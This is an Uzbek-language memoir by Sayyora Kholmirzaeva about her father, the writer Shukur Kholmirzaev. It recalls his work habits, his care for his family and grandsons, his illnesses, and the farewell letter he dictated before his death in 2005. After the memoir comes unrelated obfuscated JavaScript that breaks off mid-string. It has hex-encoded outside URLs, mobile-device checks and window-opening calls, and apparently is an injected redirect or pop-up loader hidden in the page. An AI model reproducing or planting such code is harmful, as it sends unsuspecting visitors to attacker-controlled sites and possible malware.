Шукур Холмирзаев – Ўзбекистон халқ ёзувчиси. 1940 йилнинг 24 мартида Сурхондарё вилоятининг Бойсун туманидаги Шаҳидлар гузарида зиёли оилада туғилган. Талабалик йилларидаёқ “Оқ отли”, “Тўлқинлар” номли китоблари чоп этилган. “Сўнгги бекат”, “Қил кўприк”, “Олабўжи”, “Йўловчи”, “Динозавр” каби романлар, “Ўн саккизга кирмаган ким бор”, “Йўллар, йўлдошлар”, “От йили”, “Юр, тоғларга кетамиз” каби қиссалар, “Қора камар”, “Зиёфат” каби драматик асарлар, “Бинафша ҳидланг, амаки!”, “Одил ака ҳақида ўйласам”, “Тақдир башорати”, “Тоғларга қор тушди” каби бадиялар, “Ҳаёт абадий”, “Ўзбек характери”, “Қадимда бўлган экан”, “Бодом қишда гуллади”, “Ёзувчи”, “Табассум”, “Банди бургут” каби кўплаб ҳикоялар муаллифи. Шукур Холмирзаев ўзбек миллий адабиётида ҳикоячилик мактабини яратган адиб сифатида тан олинган. У Ойбек номидаги адабиёт мукофоти, Давлат мукофоти, “Меҳнат шуҳрати” ордени, Ўзбекистон мустақиллигининг 10 йиллиги нишони билан тақдирланган. Шукур Холмирзаев 2005 йилнинг 29 сентябрида Тошкент шаҳрида вафот этган.

Сайёра Холмирзаева
филология фанлари номзоди, доцент

“Мен – адамнинг қизиман”

1
Бувимнинг вафотларидан кейин бир неча йил ўтгач, 2001 йилда улар ҳақида “Юракни ўртовчи соғинч” сарлавҳаси остида мақола ёзиб, адамга кўрсатган эдим. Адам ўқиб чиққач, “Қизим, мен ҳақимда ҳам кейинчалик шунақа мақола ёзасанми” , деганлари ёдимга тушди. Шунда мен, “Адажон, қўйсангиз-чи бунақа гапларни” деб, мавзуни бошқа ёққа буриб юборган эдим. Тўғрисини айтсам, бу ҳақида у пайтлар ўйлаб ҳам кўрмаганман, чунки мен учун адам доим ёнимда суянчиғим, ишонганим, ғамхўрим бўлиб қолаверадигандек туюларди. Йиллар ўтиб ўша кунларга соғиниб қайтиш, қайсидир даражада уларни қоғозга тушириб хотирада тиклаш, асарларини тўплаб, чоп эттириш, ижодларини қадр топаётганини кўриш ҳаётимнинг энг мазмунли, энг асосий қисмига айланди.
Тоғларни, арчаларни, сўқмоғ-у қирларни, ҳайвонот оламини, бир сўз билан айтганда, табиатни севиб, уларнинг бағрида улғайган адамнинг 13 ёшидан шеърлари, турли лавҳалари, 17-18 ёшидан ҳикоялари матбуотда чоп этила бошланган эди. Болаликдан ўта ростгўй, зеҳни ўткир,ҳақиқатпараст бўлиб вояга етган адам бир умр ўз қарашларга содиқ қолганлар. Мен болалигимдан адамни яхши кўриб, ҳурмат қилиб, улар билан доим фахрланиб катта бўлганман. Улар – тўғрисўзлиги, ҳалоллиги, яқинларга ғамхўрлиги, ақллилиги билан доим менга ибрат бўлиб келганлар.
Улар бутун умр ўз виждонларига қарши иш қилмаганлар, тўғри гапни тик айтганлар, хушомадни ёқтирмаганлар. Адамни, “мен учун ҳеч қачон уялмайсизлар”, деган гаплари бўларди. Уларни яхши билганлар жиддий, ғурурли, самимий, қалби тоза инсон сифатида ҳурмат қилишган. Адам ўзлари учун ҳеч кимдан ҳеч қачон нарса сўрамаганлар, баъзан бир қўнғироқ билан битиши мумкин бўлган ишни ҳам қилмасдилар. Лекин дўстларига, таниш-билишларига, шогирдларига қўлларидан келган ёрдамни аямас эдилар. Фақат ижод бобида, ёзиш бобида ижодкор дўстларига ҳам, шогирдларига ҳам қаттиққўллик қилардилар, кескин лекин “аччиқ ҳақиқат” бўлган бешафқат гапларни айтишдан тап тортмасдилар. Қўллари очиқ, саҳий эдилар, дўстлари, қариндошлар, шогирдлари ханузгача турли воқеаларни, совға қилинган буюм ва нарсаларни хотирлайдилар. Холбуки, адам 1981 йилдан бошлаб, яъни 41 ёшларидан то умрининг охирига қадар бирорта давлат ташкилотида расмий ишламаганлар. Йиллар, ойлар, кунлар давомида миллий адабиётимизни бетакрор бадиий асарлар билан бойитганлар. Нашр этилган китоблар, газета ва журналлардан тушган қалам ҳаққи ҳисобига кун кўрилган. Шундай йиллар ҳам бўлганки, қалам ҳаққи энг оддий кундалик эҳтиёжни қондиришга ҳам етмасди. Нафақа ола бошлаган кунларидан то умрларининг сўнгги кунларигача ўз нафақаларидан бизларга, оила аъзоларига ҳам бўлиб берардилар. Мен ҳар гал “ўзингизга керак бўлади-ку, мен ишласам, ойлик олсам”, десам, “йўқ, набираларимга ширинликлар олиб берасан”, деб қўймасдилар. Озгина у ёқ- бу ёқдан тушган қалам ҳақини ҳам улашиб чиқардилар ва кейин, албатта, ўз қўллари билан ош қилиб берардилар. Мен уйда ош дамлаётганимда, ҳар доим ичимда “менинг қўлим эмас, адамнинг қўллари” деб пичирлаб қўяман. Шунда, назаримда пишираётган ошим адамникига ўхшайдигандек туюларди. Чунки мен ош тайёрлашни адамдан ўрганганман.
Адам тонг чоғи туриб ишлашни яхши кўрардилар. Бадантарбия қилиб, аччиқ қора чой ёки кофе тайёрлаб, худди кўчага отлангандек кийиниб олардилар, оёқларига туфли киярдилар. Кейингина иш столларига ўтирар эдилар. Деярли кун давомида қисқа-қисқа танаффус қилиб, ишлайверардилар, кундуз кунлари дам олиб ётадиган одатлари йўқ эди. Уларни ҳея қачон спорт кийимида ёки кенг уй кийимида кўрганимни эслай олмайман. Уйга меҳмон келадиган бўлса, галстук тақиб, энг охорли кийимларини кийиб олардилар.
Бир марта менга шундай дегандилар: “Жуда ишлагим келди, лекин кун ёришишини кутдим, қўшниларни уйқусини бузгим келмади. Машинкани овози уларга эшитилади. “Ёзувчи кечаси ухлатмади”, дейишмасин-да”.
Телевизорда сиёсий ва адабий кўрсатувлардан ташқари табиат ва ҳайвонот дунёси билан боғлиқ кўрсатувларни кўришни яхши кўрардилар. Москвадан олиб бериладиган “Ҳайвонот оламида” кўрастувини ўтказиб юбормасдилар ва бизларни ҳам кўришимизни истардилар.
Мактаб пайтларимда адам иш столларида машинкаларини чиқиллатиб ишлаётганларида кўнгиллари тўлмаган ёки таҳрирталаб бўлган қоғозларни столнинг четига ташлар эдилар ва ўша бетларни бошқатдан ёзардилар. Мен ҳали жуда ёш эдим, у ёзилган қоғоз варақларни олиб қўйиш кераклигига ақлим етмасди. Қоғоз уюм-уюм бўлиб кетарди, улар ҳозир сақланмаган. Қўлларида охирги нусхаси қоларди. Агар битта-яримта хато сўз ўтиб кетган бўлса, секин пискада ўчириб, қора ручкада устидан юргизиб тўғирлаб қўярдилар. Уюм-уюм тўпланиб ётган қоғозларнинг ичида баъзан бутун-бутун асарлар ҳам, охирги нусхасигача ташланганини ва натижада матбуот юзини кўрмай кетган асарлар ҳам бўлганини кейинчалик билдим.

2
1972 йилнинг ёзида адам мен(10 ёшда) билан укамни(7 ёшда) ёзги таътилда Сурхандарёга бир ўзлари олиб борган эдилар. Опамни иш жойларидан(Ўзбекистон телерадио компаниясидан) Ҳиндистонга малака оширишга юборишган эди. У пайтлар адамни ҳали машинлари йўқ эди. Бойсунга бир неча кун ичида етиб борганмиз. Катта ҳовли қариндош-уруғларга тўла эди. Адамнинг акалари Иноятилла ака Замира янга билан, сингиллари Барно опа, укалари Неъмат акалар Санобар янга билан, уларнинг фарзандлари ўша ерда эканлар. Бизларни момом, бобом, барча қариндош-уруғларимиз хурсандлик билан кутиб олишган. Момомнинг барча неваралари ҳар куни қўл ушлашиб бозорга йўл олардик. Момом Бойсун бозорига раислик қилардилар, тўғри уларнинг ишхоналарига кириб борардик. Улар бозорни айлантириб, биз ёқтирган, хоҳлаган нарсаларимизни олиб берардилар. Тушдан кейин эса, адам дўстлари билан мени, укамни, яна бирорта жиянларини машинага ўтказиб атрофларни айлантирар, томоша қилдирар эдилар, меҳмондорчиликларга олиб борардилар. Тошкентга келишимиздан олдин эса адам Бойсундаги дўконларга кириб, бизлар учун мос келадиган кийим-кечакларни харид қилардилар. Тошкентдаги бувимга, Ҳиндистондаги опамга ҳам совға-саломлар олинган эди.
Мен юқорида опам Ҳиндистонга малака оширишга кетган эдилар, деб ёзган эдим. Ҳозир шу ҳақида ҳам бир оз тўхталиб ўтмоқчиман. Опам 40 йилдан ортиқ Ўзбекистон телерадио компаниясининг Чет элга эшиттириш тайёрлайдиган бўлимида ҳинд тилидан таржимон ва диктор бўлиб ишлаганлар. Ўша бўлимнинг очилишида тамал тошини қўйганлардан, ўз соҳасининг етакчи мутахассиси-ҳиндшуноси сифатида қадрланиб келганлар. 1972 йилда худди шу бўлимга радио тарихида биринчи марта Ҳиндистонда малака ошириш бўйича битта ўрин берилади. У пайтларда чет элларга малака ошириш учун юборилмас эди. Ташкилотнинг ўзи ҳам Москвага бўйсунганлиги сабабли, битта ўрин ҳам Москвадан юборилган. Жамоа ва раҳбарият Ҳиндистонга, ўн ойга малака оширишга юбориш учун опамнинг номзодларини лойиқ деб топишган. Бу ҳолатни адам, опам, бувим бирга ўтириб, маслаҳат қилишган. Шунда адам бундай имконият камдан-кам бўлишини, опам учун бу ўқиш ўз соҳаси бўйича келажакда муҳимлигини тушуниб, уларнинг хоҳишларига қаршилик кўрсатмаганлар. Ҳа, адам кутилаётган оғирликларни, масъулиятни ўз елкаларига олиб, қийин бўлишини била туриб, опамнинг ўн ойга кетишларига розилик билдирганлар. Шундай қилиб, опамни Тошкент аэропортидан Москвага адам, бувим, Ботир ака(Зокиров), Абдулла ака(Орипов), Учқун акалар(Назаров) кузатиб қўйишган. Сўнг опам Москва аэропортидан Ҳиндистонга учиб кетганлар. Ўн ой давомида опамдан узоғи билан ўн кун ичида хатлар келарди. Битта хат адамнинг номларига, яна биттаси бувимнинг номларига. Бувимнинг номларига ёзилган хатларни улар мен билан укамга ўқиб берардилар. Адам билан опамнинг ўрталаридаги ёзишмаларни 3-4 таси сақланиб қолган. Хатларнинг мазмунидан кўринадики, адам конверт ичига ёзган ҳикояларидан нусхалар ҳам солиб юборган экан. Жавоб хатида опам асар ҳақида ўз фикрларини билдирганлар ҳамда ўзларига маъқул бўлган ҳинд ёзувчиларининг ҳикоялар ҳақида фикр билдирганлар.
Шундай қилиб, уйда адам, мен ва укам ўзимиз яшай бошладик. Адам мени ва укамни мактабга кузатиб қўярдилар, бирга дарс тайёрлардик, олган “5” баҳоларимиз билан уларни хурсанд қилардик. Кўпинча, кечки овқатни уйимизнинг ёнидаги “Лаззат” кафесида қилардик. Баъзан адам ўша кафедан тайёр овқатларни олиб келардилар. Бувим у пайтлар ҳали ишлар эдилар, Шайҳонтохур туманидаги ЗАГС бўлимини бошқарардилар. Шунинг учун улар якшанба кунлари эрталаб келиб, кийим-кечакларимизни тартибга солардилар, уй ишларида ёрдам берардилар, баъзан мен ва укамни ўзлариникига – эски шаҳардаги ҳовлиларига олиб кетардилар. Қўшниларимиз Ҳанифа опа(А. Ориповнинг рафиқаси), Чаман опа(Д. Нурийнинг рафиқаси), Рўза опа(О. Мухторнинг рафиқаси) доим мендан ҳол-ахвол сўраб туришарди. Худди шу йили адамнинг “Кулган билан кулдирган”, “Ўзбекнинг соддаси”, “Биз кеч қолиб юрамиз”, “Ора йўл”, “Тикан орасидаги одам” каби ҳикоялари газета ва журналларда чоп этилган эди. Ҳозир ўйлаб қарасам, адагинам бир пайтнинг ўзида ижод қилишга ҳам, фарзандларига тарбия беришга ҳам, ишга бориб келишга ҳам улгурган эканлар-а.
1971-1975 йиллар давомида адам Муқимий номли мусиқа драма театрида адабий эмакдош бўлиб ишлаганлар. Менинг синф раҳбарим Мавжуда опа адамдан таътил пайтлари болаларга атаб қўйилган спектаклларга билетлар олиб беришларини илтимос қиларди. Адам ҳар гал бу илтимосларни бажарардилар.

3
Адам билан опам доим шаҳар театрларида қўйилаётган янги саҳна асарларининг премьерасига бориб туришарди. Опам хонанда Алла Пугачева Тошкентга гастроль билан келганида, унинг концертига тушишга адамни кўндирган эканлар. Концерт адамга маъқул келган, “Бу қўшиқчининг келажаги бор, ҳали машҳур бўлиб кетади”, деган эканлар. Беихтиёр адам дўстлари Ботир Зокировнинг қўшиқларини севиб тинглашларини эсладим.
Умуман адамни ҳар соҳадан дўстлари кўп эди. Рассомлар, актёрлар, режиссёрлар, қўшиқчилар, бахшилар – қисқаси санъатнинг барча кўринишлари улар учун қадрдон, муҳим, яқин эди. Уйимизда қанчадан-қанча эрталабгача қизғин гурунглар бўлган, қўшиқлар куйланган, дўмбира чертилган. Сўнгги йиллардаги кўнгилтортар яқинларидан рассом Рўзи Чориев, режиссёрлар Раҳмат Жумаев, Баҳодир Йўлдошев, олим Баҳодир Саримсоқов, таржимон Низом Комиловлар билан тонггача давом этган суҳбатларнинг ўзим гувоҳи бўлганман. Дўстлар учун эшиклари доим очиқ эди. Иш столларининг ёнидаги кичик столчанинг турли мева-чевалар билан ясатилганлиги адамга ёқар эди. Фақат ишлаётганларида, яъни ёзиб ўтирганларида биров ҳалақит беришини, вақтларини олишини истамасдилар.
Кўп ёзувчи ва шоирлар бир нечталаб чет мамлакатларига борганларини фахр билан кетма-кет санайдилар. Адам чет элларда деярли бўлмаганлар, фақат опамнинг қистовлари билан туристик йўлланма билан бир неча кунга Чехословакияга боришган. Уларнинг “чет эллари” ҳам Бойсун, у ернинг одамлари эди. Адам бутун умр Бойсунга талпиниб яшадилар. Улар учун Хоразм, Бухоро, Самарқанд, Фарғона каби юртларга оила аъзоларини олиб бориш, саёҳат қилдириш, дўстлар билан дийдорлашув, янги-янги одамлар билан танишув ҳар қандай чет элдан қадрлироқ кутилган лаҳзалар эди. Менимча, ўзлари кезмаган чет эл мамлакатларда энди улар ёзиб қолдирган асарларнинг саёҳат қилиш вақти келди. Энди улар адамни ўзбек миллатининг ўзлигини, уни феъл-атворини очиб берган бадиий дурдоналари орқали танишса ажаб эмас.
Адамни бир неча кунлаб ёки икки-уч ҳафталаб санаторийларда турли муолажаларга қатнаб, дам олиб ётишларини тасаввур қила олмайман. Балки шу нарсалар амалга ошганида, адам кўпроқ умр кўрган бўлармидилар…Улар қаерларгадир бир-икки ойга борадиган бўлсалар ҳам(масалан Қўрғончи, Учқизил), ёзаётган асарларини тугаллаб келиш учун, ишлагани борар эдилар. Касалхонада даволанишни эса мутлақо истамасдилар, энг охирги дақиқадагина, бошқа ҳеч қандай иложи қолмагандагина ётишга рози бўлардилар.

4
2001 йилнинг 20 август куни. Ўғилларим билан адамдан хабар олгани дача- боғларига борсак, бир кун аввал чой дамлаётганларида чойнакдаги қайноқ сув чап оёқларининг топиғига тўкилиб, оёқларини куйдириб қўйган эканлар. Тўғриси, дача-боғда яшаш учун шароит деярли йўқ эди, бир амаллаб мослашган эдилар. Лекин ҳар йили кеч кузгача ўша ерда қолиб кетардилар. Шаҳардаги уйларига фақат изғирин совуқ тушгандан кейингина қайтар эдилар, эртароқ шаҳарга кўчишга ҳеч ҳам рози бўлмасдилар. Адамдан бўлган воқеа ҳақида суриштириб турган эдим, дарвоза ёнидан машинада ўтиб кетаётган Дадахон ака(Нурий) бизларни кўргач, тўхтаб, сўрашгани ҳовлига кирдилар. Дадахон ака шаҳардаги уйимизда минг йиллик бир девор қўшнимиз бўлганлар. Адамнинг чап оёқларининг тўпиғи шилиниб тушган, жароҳат оғриқ бераётгани сезилиб турарди. Биз Дадахон ака билан иккимиз шу яқиндаги санаторийнинг врачига кўрсатишга адамни кўндирдик. Машинага ўтказиб, олиб бордик. Врач оғриқсизлантирувчи дори қўйиб, ярани боғлади ва албатта, касалхонага боришлари кераклигини тайинлади. Дачага қайтиб келгач, адам касалхонага олиб боришимизга ҳеч ҳам унамадилар. “Йўқ, бормайман, ўтиб кетади, ишларим кўп,”-деб туриб олдилар. Мен кўнглим ғаш бўлиб, болалар билан уйга қайтиб келдим. Лекин тинчимни йўқотган эдим. Бир кунни ўтказиб, ишдан эртароқ чиқдим-да, дачага қараб йўл олдим. Адам ҳовлидаги супада оёқларини осилтириб ўтирган эканлар, кайфиятлари йўқ, кўринишлари ҳам яхшимас, доим келганимда ёнимга пешвоз бўлиб чиқадиган адамни бу ҳолда кўриб, ҳафа бўлиб кетдим. Чап оёқларининг паст қисми шишиб кетган, жароҳат оғриқ бераётганидан, қийинчилик билан босиладиган ҳолга келган, бунинг устига инфекция тушган шекилли, иситма ҳам бераётган экан. “Ада, мен ҳозир машина олиб келаман, кўчага чиқиб. Меникига кетамиз”,- дедим кескин оҳангда. Адам бир оғиз ҳам қаршилик кўрсатмадилар, ихтиёрларини тўлиқ менга топширдилар. Машинага ўтириб, 9- қаватдаги уйимга етиб келдик. Бир амаллаб ювиниб чиқдилар, кейин овқатландик. Оёқларини чўзиб, хонтахта ёнида бир оз дам олдилар. Севимли кофеларидан ичдилар. Кейин мен уйга “Тез ёрдам” хизматини чақирдим. Ярим соат ўтар-ўтмас “Тез ёрдам” етиб келди. Ўрта ёшлардаги врач аёл адамнинг аҳволларини кўриб, зудлик билан касалхонага олиб кетишини, госпитализация қилишини айтди. “Оёқ куйган куниёқ ярани даволаш керак эди. Акс ҳолда ёмон асоратларга олиб келиши мумкин-ку”,- деди куйиниб.
Шундай қилиб, 2001 йилнинг 22 август куни бизларни “Тез ёрдам” машинасида Чорсудаги биринчи шаҳар касалхонасига олиб кетишди. Адам касалхонада саккиз кун ётдилар, лекин у ерда ётганларини деярли ҳеч кимга айтмадик, улар шуни хоҳладилар. Адамдан хабар олгани ҳар куни ўзим бориб турдим. Саккизинчи куни адамни у ердан соғ-саломатликда олиб чиқиб кетдим. Юқорида айтганимдек, дача-боғда шароит йўқлиги сабабли озодаликка тўлиқ риоя қилиш имконияти йўқ эди. 2004 йилнинг 28 июль кун ҳам адам ўзларини ёмон ҳис қилган эдилар. Қоринларида кучли оғриқ бошланиб, уларни ҳолсиз қилиб қўйган эди. Шунда касаллик сабабини аниқлаштириш ва даво топиш учун давлат поликлиникасига борган эдик. Текширув натижаларидан кейин врач адамни ўша заҳотиёқ инфекцион касалхонага ётишлари кераклигини, ҳозироқ машинада ўзлари олиб боришларини айтган эдилар. Адам эса: “Мен инфекцион касалхонага бормайман”,- деб туриб олгандилар. Менга қараб: “Мени уйинга олиб кетгин, қизим. Ўша касалхонага ётқизмагин. У ерга кўргани келганингда, сени ҳам киритишмайди. У шундай жой”,-дедилар. Хуллас, врачлар эътирозига қарамай, биз уйда даволанадиган бўлдик. Битта хонани адам учун “палата” қилгандик, вақтинча болаларни ҳам киритмай турдик. Поликлиникадан медицина ходимлари келиб осма укол, укол қилишар, парҳезга риоя қилаётганларини назорат қилишар, қисқаси, муолажалар худди касалхонадагидек бўлганди. Уйда ёш болалар борилигини билиб, уларга юқмаслиги учун поликлиникадан келиб, уйни дезинфекция қилиб ҳам кетишган эди. Адам бутунлай тузалиб кетганларидан кейингина яна дача-боғларига қайтиб борган эдилар.

5
Адам нафақат меҳрибон ота, балки фарзандларимнинг меҳрибон “Шукур бува”си ҳам эдилар. Фарзандларимни дача-боғларига олиб бораманми, ёки шаҳардаги уйларигами “полвонларим келди”, деб хурсанд бўлиб кетар эдилар.Улардан ўқишлари, ўқиётган китоблари, дўстлари ҳақида сўраб суриштирардилар, сўнггида эса “опангни гапига кириб юринглар”, деб тайинлардилар.
Хотирани жонлантирар эканман, кўз олдимга ўғлим Қаҳрамоннинг қоп-қора чойнакни кўтариб турган ҳолати келди. Иштон-кўйлагининг олдиларига ҳам қора теккан, лекин ўзи хурсанд, кулиб турибди. 2002 йил эди, август ойининг бошларида дача-боғларига борганимда доимгидек адам билан анча гурунглашиб ўтирдик. Шунда адам: “Қизим, Қаҳрамон ҳозир таътилда. Бир неча кун мен билан шу ерда яшашига рухсат бергин”, деб қолдилар. Тўғриси, аввалига нима дейишни билмай қолдим. Қаҳрамон ўзи 9 ёшларда, шу пайтгача уйдан ташқари ҳеч қаерда ётиб қолмаган, тўққизинчи қаватда катта бўлаётган болача эди. “Йўқ” десам, дилларини оғритиб қўйишим мумкин эди. Шунда мен: “Ада, шу пайтгача Қаҳрамон бирор кун ҳам оиладан узоқлашмаган. Бунинг устига, бу ерда шароит оғирроқ, қийналиб қолишинглар мумкин. Ишингиздан ҳам чалғитиши мумкин. Ҳар ҳолда ёш бола, инжиқликлари ҳам бўлиши, эҳтимол”, -деган эдим. Адам: “Қизим, якшанба куни неварамни олиб келиб, бир ҳафтага мен билан қолдириб кетасан. Биламан, хавотир оляпсан. Сенга ҳар куни кечқурун соат 7-8 ларда, Ёзувчилар боғига бориб, ўша ердан қўнғироқ қиламиз. Биласан, у ерда шаҳар телефони бор. Сенга ҳисобот бериб турамиз”, -дедилар. Шундай қилиб, якшанба куни Қаҳрамон кийим-кечаклари, баъзи ўйинчоқлари, қоғоз-қаламлари солинган сумкачасини кўтариб, дача-боғга кириб келди. У дача-боғда бир ҳафта буваси билан яшашини эшитгач қувониб кетган, ҳатто унга эргашган укаси Жавлонбекка: “Сен ойижон билан қолгин. Каттароқ бўлсанг, сен ҳам борасан. Телефонда гаплашиб турамиз”, – деган эди катта болалардек. Шунда биринчи марта ўғлим улғаяётганини сездим ва қалбим қувончга тўлди. Ваъдага кўра, улар ҳар куни кечқурун қўнғироқ қилишди, адам билан ҳам, Қаҳрамон билан ҳам гаплашиб турдим. Якшанба куни ҳам етиб келди. Эрталаб ТТЗ бозорига кириб, керакли нарсаларни харид қилдим, кейин дача-боғ томон йўл олдим. Ҳовлига яқинлашгач, шундоққина кўчада 3-4 та болаларни велосипед учиб юрганларини кўрдим. Уларнинг ичида Қаҳрамон ҳам бор эди. Маҳалланинг ўзбек, қозоқ болалари билан худди бутун умр шу қишлоқда яшаётгандек дўстлашиб кетишибди. Мени кўриб, велосипеддан тушиб, ёнимга югуриб келди, саломлашди, қўлимдаги сумкаларни олиб, бувасини чақириб, ҳовлига кириб кетди. Кичкина хонада ишлаб ўтирган адам Қаҳрамоннинг овозини эшитгач, чиқиб келдилар:”Эй, полвонимни онаси келибди-да”, – дедилар, сўрашдик. Супага жой тайёрладик. Шунда Қаҳрамон: “Ҳозир чой олиб келаман”, деса бўладими. Мен ҳайрон бўлиб адамга қарадим, улар кулиб қўйдилар. Бир оз вақт ўтгач, ҳикоямнинг бошидаги ҳолатга кўзим тушди. Ғиштдан ясалган ўчоқда чойнакда сув қайнатиб олиб келибди. Кейин чой дамладик. Бориб ўчоқни томоша қилгандим. Қаҳрамон эса ўчоқда овқат қилишни ҳам Шукур бувасидан ўргангани ҳақида гапириб кетди. Шундай қилиб, ўчоқда ошни ҳам адам, мен, Қаҳрамон бирга пиширдик. Кечга яқин уйга отлана бошладик. Қарасам, эшикнинг тагида ўртоқлари қараб туришибди, улар билан хайрлашди, яна келишини айтди. Буваси билан бирга яшаш яхшилигини, яна қолиш истаги борлигини айтганида, кейинроқ яна албатта бир неча кунга келишини айтдим. Бу қайсидир маънода, Қаҳрамоннинг ҳаётдаги илк мустақил кунлари бўлганини ҳис қилдим. Адам ўзлари билиб-билмай Қаҳрамонни биринчи марта эркинликка, ҳаётга ўргатдилар.
Адам, суҳбатларимизнинг бирида шундай деган эдилар: “Қизим, Қаҳрамон каттароқ йигит бўлганида, мен билан бирга яшасин.”. Шунда мен адамни хурсанд қилиб, шундай деган эдим: “Хўп бўлади, адажон. Сизга ҳам қараб юради, ҳам барча ишларингизда ёрдамчингиз бўлади. Иш юзасидан кўчага чиққанингизда, сизга суянчиқ бўлади”. Адамнинг чеҳралари ёришиб: “Раҳмат қизим, ишқилиб, Оллоҳ умр бериб, шу кунларга етказсин”- дегандилар.
Шунда беихтиёр Қаҳрамонни буваси билан бирга яшаганида ҳар куни кечқурун ўзлари унга жой солиб берганларини, уйқудан олдин эса эркаловчи гаплар билан унга меҳрибончилик қилганликларини айтиб бергани эсимга тушди.

6
Адам доим ўзаро суҳбатларида умрларининг сўнгги дамларига қадар ёзиш имконияти тарк этмаслигини ният қилардилар. Худди шундай бўлди ҳам(ўзлари айтганларидек “ёзишдан қолганалари йўқ”). Чунки адам учун ижод қилмасдан умр кечириш маънисиздек туюларди. Бу ёруғ дунёда яшашдан, нафас олишдан мақсад ўй-фикрларини бус-бутун эгаллаган асарларини тугатиш бўларди. Столларида 4-5 та бошланган ҳикоялари ҳамда уларнинг вариантлари чала қолиб кетди.
2005 йилнинг 20 июль куни. Адам анча тетик эдилар. Лекин 4-5 кун аввал айрим оғриқлар тўхтовсиз безовта қилганлиги сабабли врач ва ҳамширани чақирган эдик, дори-дармонларни ўз вақтида ичиш каби бир қанча кўрсатмаларни бериб кетишган, уларнинг назорати остида эдилар. Эрталаб туриб, нонушта қилдик, кейин секин ишга отлана бошладим. Буни кўрган адам: “Қизим, соат неччиларда ишдан қайтасан?”-деб сўраб қолдилар. Мен узоғи билан 3-4 соатда қайтиб келишимни айтиб, “бирор ишингиз бормиди, адажон?”- деб сўрадим. Шунда адам: “Икки-уч бетлик нарсани айтиб туриб ёздирмоқчи эдим”,-дедилар. Мен эса, “Ада, хоҳласангиз мен келганимдан кейин ёзамиз, унгача дам олиб турарсиз. Агар ҳозир ёздирмоқчи бўлсангиз, мана – Қаҳрамон, сизга қараб туришини тайинлагандим, – ҳамма айтган гапларингизни қоғозга туширади, ўзи хатосиз ёзади”,- дедим. Шундан кейин ишга кетдим. Ишда биров кўриндимда, керакли нарсаларни харид қилиш учун аввал дўконга кейин дорихонага ўтдим. Уйга кириб келишим билан, адам: “Ана, болам, вақтида ёзиб бўлибмиз, Опанг ҳам дарров етиб қолди”, – дедилар Қаҳрамонга қараб. Мен ошхонага ўтаётган эдим, адам: “Қизим, чой кейин…Ҳозир сен менга овоз чиқариб ёзган нарсаларимизни ўқиб бергин”, -дедилар ва креслога бемалол суяниб ўтирдилар. Мен стулни уларга яқинлаштириб суриб, столда ёйилиб ётган, катта-катта ҳарфлар блан ёзилган бир нечта қоғоз варақларини қўлимга олиб, кўз югуртира бошладим. “Эна қизим Сайёражон” деган сарлавҳага кўзим тушди. Тўғриси, нима ҳақида ёзилганлигидан хабарим йўқ эди. Матнни ўқий бошладим. Лекин бир оз ўқигач, чидай олмадим, томоғимга нимадир тиқилди, кўзимга келаётган ёшни тўхтата олмадим. Айтган гапим шу бўлди: “Ада-аа, нимага бунақа гапларни ёздирдингиз? Ҳали ҳаммаси яхши бўлади, тузалиб кетасиз-ку”. Шунда адам: “Қизим, шу номда эссе ёзишни ўйлаб қўйган эдим, сенга бағишлаб. Лекин соғлиғим борган сари ёмонлашяпти. Эссе ёзишга улгурмайман, шекилли. Шунинг учун сенга шу мактубни ёзиб қолдиряпман. Қизим, биласанми, эссени қандай бошланишини ва якун топишини ҳам ўйлаб қўйган эдим. Сени биринчи марта Бойсунга олиб боришимиздан бошламоқчи эдим. Унда ҳали мен ҳам, опанг ҳам талаба эдик, 1,5-2 ёшларда эдинг. Термиз шаҳригача поездда бориб, кейин Бойсунга машинада кетилар эди. Сени кўтариб, поезд вагонидаги ойнадан томоша килдиряпман. Шунда поезд кенг яйловзордан ўтаётганда, сигир ва қўйларни ўтлаб юрганини кўриб, сен қўлинг билан кўрсатиб “мо-мо” деб бақирган эдинг. Мана шу воқеадан эссени бошламоқчи эдим”.
Мен эса секин ошхонага ўтдим, кўнглим бузилиб, кўз ёшларимни сездирмасликка ҳаракат қилдим.
2005 йилнинг 29 сентябрида, орадан икки ой-у тўққиз кун ўтгач, адам бу оламдан кўз юмдилар. Кейинчалик бу мактубни адамнинг сўнгги истакларига кўра, “Сайланма”ларининг 3 жилдига киритдим.
Назаримда, адажоним бу мактубни ҳаётим давомида менга мадад бўлиши учун, меҳрни туйиб юришим учун, ҳеч қачон ўзимни ёлғиз ҳис қилмаслигим учун, йиқилсам, туришимга ёрдам бериши учун, ўзимни қийинчиликлар олдида йўқотиб қўймаслигим учун, кимни фарзанди эканлигимдан фахр туйғусини ҳис қилиб яшашим учун ҳам менга ҳамроҳ қилиб ёзиб қолдирганлар…
2018 йил.

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x